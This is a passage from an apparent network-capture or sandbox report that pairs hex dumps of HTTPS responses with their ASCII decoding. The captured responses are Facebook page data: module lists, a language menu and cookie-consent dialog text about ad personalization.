                                                                                                                                                                                    Data Ascii: "fBNyzd4","+CEjbBy","SgD0G1q","ORfF6wp","147vx5A","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["uZnYnjA"]},"be":1},"DOM":{"r":["fBNyzd4","+CEjbBy","e3dyWaF"],"be":1},"Form":{"r":["fBNyzd4","uZnYnjA","+CEjbBy","e3dyWaF"],"be":1},"FormS
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15396INData Raw: 42 32 5a 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 6d 36 50 63 6c 49 51 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 67 63 44 34 4e 63 52 22 2c 22 45 7a 36 31 41 33 51 22 2c 22 53 5a 37 44 71 43 42 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 61 6d 6c 4b 4f 78 6b 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 4d 37 5c 2f 6a 6c 43 52 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 31 64 36 35 55 32 6f 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 4a 32 61 39 45 70 5c 2f 22 2c 22 31 34 37 76 78 35 41 22 2c 22 67 6c 74 7a 56 37 32 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 68 76 59 44 71 32 36 22 2c 22 77 4b 49 32 2b 6a 30 22 2c 22 4b 56 2b 78 7a 43 55 22 2c 22 74 74 58 70 77 70 52
                                                                                                                                                                                    Data Ascii: B2Z","pI0Ykx3","m6PclIQ","il8+1P2","dvxITuo","gcD4NcR","Ez61A3Q","SZ7DqCB","kOEHvpu","ORfF6wp","mO2RUoG","amlKOxk","eMkMxHZ","uyLLtYc","M7\/jlCR","badRKqB","1d65U2o","CGkH4FY","J2a9Ep\/","147vx5A","gltzV72","0IBz+Hp","hvYDq26","wKI2+j0","KV+xzCU","ttXpwpR
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15398INData Raw: 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 6d 30 7a 4c 6d 36 49 22 2c 22 74 75 65 37 4e 33 65 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 30 43 4e 77 48 33 6f 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 52 77 4e 47 46 74 38 22 2c 22 50 55 64 36 34 39 6b 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 64 47 65 62 33 7a 49 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 72 72 6e 53 4d 64 39 22 2c 22 66
                                                                                                                                                                                    Data Ascii: 9","fBNyzd4","uZnYnjA","m0zLm6I","tue7N3e","jskFjuE","+CEjbBy","SgD0G1q","pI0Ykx3","0CNwH3o","dvxITuo","l+zYE0s","RwNGFt8","PUd649k","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"AsyncDialog":{"r":["dGeb3zI","R5w1rCJ","rrnSMd9","f
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15399INData Raw: 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 64 47 65 62 33 7a 49 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 5a 38 42 5c 2f 46 5a 47 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 41 69 6a 39 5a 39 22 2c 22 67 69 74 74 2b 6d 4b
                                                                                                                                                                                    Data Ascii: s":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["dGeb3zI","R5w1rCJ","rrnSMd9","fBNyzd4","uZnYnjA","ibNDccx","Z8B\/FZG","b5h\/swL","jskFjuE","+CEjbBy","eAij9Z9","gitt+mK
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15401INData Raw: 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 31 34 37 76 78 35 41 22 2c
                                                                                                                                                                                    Data Ascii: rCJ","fBNyzd4","ibNDccx","b5h\/swL","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogTitle.react":{"r":["R5w1rCJ","fBNyzd4","ibNDccx","b5h\/swL","+CEjbBy","SgD0G1q","pI0Ykx3","il8+1P2","ORfF6wp","badRKqB","147vx5A",
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15402INData Raw: 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 33 41 6c 70 6a 78 6b 6f 37 58 74 38 62 43 65 75 4b 4c 6d 45 61 53 4a 4c 4f 75 33 43 6a 4d 52 47 37 30 49 36 47 7a 65 34 75 6a 6e 48 77 57 36 35 4a 64 70 43 35 62 69 32 51 56 58 51 6c 6b 53 70 57 38 77 55 61 39 6d 4f 35 76 62 42 45 6a 67 71 68 72 45 57 7a 65 6e 68 73 4e 31 76 61 50 53 49 6b 6e 4c 59 70 36 6b 42 53 67 33 51 58 4c 67 78 35 31 34 4b 34 6b 46 6f 43 42 48 30 49 79 55 6c 36 69 42 52 55 69 4b 49 6c 70 66 47 4b 46 31 68 62 49 74 77 22 2c 22 75 6e 74 72 75 73 74 65 64 5f 6c 69 6e 6b 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 31 36 4b 72 6f 6a 5f 53 30 47 49 52 54 36 4e 4d
                                                                                                                                                                                    Data Ascii: n_linkshim_lnfb_mode":null,"link_react_default_hash":"AT3Alpjxko7Xt8bCeuKLmEaSJLOu3CjMRG70I6Gze4ujnHwW65JdpC5bi2QVXQlkSpW8wUa9mO5vbBEjgqhrEWzenhsN1vaPSIknLYp6kBSg3QXLgx514K4kFoCBH0IyUl6iBRUiKIlpfGKF1hbItw","untrusted_link_default_hash":"AT16Kroj_S0GIRT6NM
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15404INData Raw: 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 56 6a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 53 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 58 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 4f 7a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 38 45 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 46 30 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6c 5f 66 4e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 46 6e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 53 44 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37
                                                                                                                                                                                    Data Ascii: rkup_3310c079_0_f_Vj","__markup_3310c079_0_g_Se","__markup_3310c079_0_h_XG","__markup_3310c079_0_i_Oz","__markup_3310c079_0_j_8E","__markup_3310c079_0_k_F0","__markup_3310c079_0_l_fN","__markup_3310c079_0_m_Fn","__markup_3310c079_0_n_SD","__markup_3310c07
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15405INData Raw: 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 67 48 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 45 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b
                                                                                                                                                                                    Data Ascii: ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_5_gH"},"label":"Espa\u00f1ol","title":"","className":"headerItem"},{"class":"headerItem","value":"es_ES","selected":false,"ctor":{"__m":"MenuSelectableItem"},"mark
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15406INData Raw: 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 42 49 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65
                                                                                                                                                                                    Data Ascii: "title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_d_BI"},"label":"Portugu\u00eas (Brasil)","title":"","className":"headerItem"},{"class":"he
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15408INData Raw: 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 46 30 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6c 5f 47 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39
                                                                                                                                                                                    Data Ascii: MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_F0"},"label":"\u010ce\u0161tina","title":"","className":"headerItem"},{"class":"headerItem","value":"el_GR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15409INData Raw: 68 5f 54 57 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 7a 33 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 7a 68 5f 43 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65
                                                                                                                                                                                    Data Ascii: h_TW","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_r_z3"},"label":"\u4e2d\u6587(\u53f0\u7063)","title":"","className":"headerItem"},{"class":"headerItem","value":"zh_CN","selected":false,"ctor":{"__m":"MenuSele
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15411INData Raw: 75 65 2c 22 61 64 64 65 64 42 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 7d 5d 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 22 7d 2c 22 63 6c 61 73 73 4e 61 6d 65 73 22 3a 5b 22 5f 39 6f 2d 77 22 5d 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 4a 4a 22 7d
                                                                                                                                                                                    Data Ascii: ue,"addedBehaviors":[{"__m":"LayerFadeOnHide"},{"__m":"DialogHideOnSuccess"},{"__m":"LayerHideOnTransition"},{"__m":"LayerRemoveOnHide"}],"attributes":{"data-testid":"cookie-policy-manage-dialog"},"classNames":["_9o-w"]},{"__m":"__markup_9f5fac15_0_0_JJ"}
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15412INData Raw: 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 69 64 3d 5c 22 63 6f 6f 6b 69 65 5f 62 61 6e 6e 65 72 5f 74 69 74 6c 65 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 64 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 69 64 3d 5c 22 63 6f 6e 73 65 6e 74 5f 63 6f 6f 6b 69 65 73 5f 74 69 74 6c 65 5c 22 3e 41 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 6f 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 3f 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 67 5c 22 3e 5c
                                                                                                                                                                                    Data Ascii: 003C\/span>\u003C\/a>\u003C\/div>\u003C\/div>\u003Cdiv id=\"cookie_banner_title\" class=\"_9o-d\">\u003Cdiv id=\"consent_cookies_title\">Allow the use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\">\
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15414INData Raw: 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 63 6f 6f 6b 69 65 73 5c 2f 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 76 5c 22 20 69 64 3d 5c 22 63 70 6e 2d 70 76 2d 6c 69 6e 6b 5c 22 3e 43 6f 6f 6b 69 65 20 50 6f 6c 69 63 79 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65
                                                                                                                                                                                    Data Ascii: ref=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookie
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15415INData Raw: 6f 78 47 72 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 5c 75 32 30 31 39 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 62 65 74 74 65 72 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 64 20 6d 65 61 73 75 72 65 20 74 68 65 69 72 20 70 65 72 66 6f 72 6d 61 6e 63 65 5c 75 30 30 33 43 5c
                                                                                                                                                                                    Data Ascii: oxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15417INData Raw: 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e
                                                                                                                                                                                    Data Ascii: 03C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\"_9si-\">Ad settings\u003C\/p>
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15418INData Raw: 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 74 68 20 74 68 65 6d 2c 20 73 75 63 68 20 61 73 20 76 69 73 69 74 69 6e 67 20 74 68 65 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 20 6f 72 20 4d 65 74 61 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20
                                                                                                                                                                                    Data Ascii: with us about your interactions with them, such as visiting their apps or websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login or Meta Pixel, to share this information
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15420INData Raw: 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 74 6d 4f 6f 44 76 44 37 57 51 39 6f 33 38 48 4c 70 59 6c 56 4c 57 6e 4b 59 42 68 5f 53 34 7a 79 74 6e 36 5f 6d 6c 7a 74 68 76 2d 77 71 39 72 76 36 53 76 76 70 5a 58 4f 63 4f 48 32 4c 44 4d 31 54 37 76 70 70 36 59 57 33 68 5f 50 64 41 55 69 4b 78 4c 4d 38 67 50 66 38 4f 42 41 6f 56 73 43 2d 75 4b 41 57 7a 32 68 46 63 4c 78 70 6b 76 42 31 48
                                                                                                                                                                                    Data Ascii: nce\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT0tmOoDvD7WQ9o38HLpYlVLWnKYBh_S4zytn6_mlzthv-wq9rv6SvvpZXOcOH2LDM1T7vpp6YW3h_PdAUiKxLM8gPf8OBAoVsC-uKAWz2hFcLxpkvB1H
                                                                                                                                                                                    2023-01-05 07:59:13 UTC15421INData Raw: 6e 38 75 6c 6d 4e 34 42 74 44 4e 72 37 59 44 2d 78 62 58 59 4b 35 66 38 43 54 48 6c 71 2d 4e 50 51 4f 72 71 6d 4b 44 4b 4b 33 41 49 75 46 30 5f 72 51 41 44 55 72 54 4f 6f 32 51 32 76 42 4d 36 38 77 39 7a 61 78 56 4f 2d 79 6d 39 73 43 36 78 77 64 5a 43 6d 33 75 63 6b 6b 59 61 6e 37 68 37 51 41 6d 75 7a 57 54 57 66 42 36 4f 4f 6f 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70
                                                                                                                                                                                    Data Ascii: n8ulmN4BtDNr7YD-xbXYK5f8CTHlq-NPQOrqmKDKK3AIuF0_rQADUrTOo2Q2vBM68w9zaxVO-ym9sC6xwdZCm3uckkYan7h7QAmuzWTWfB6OOog\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"http
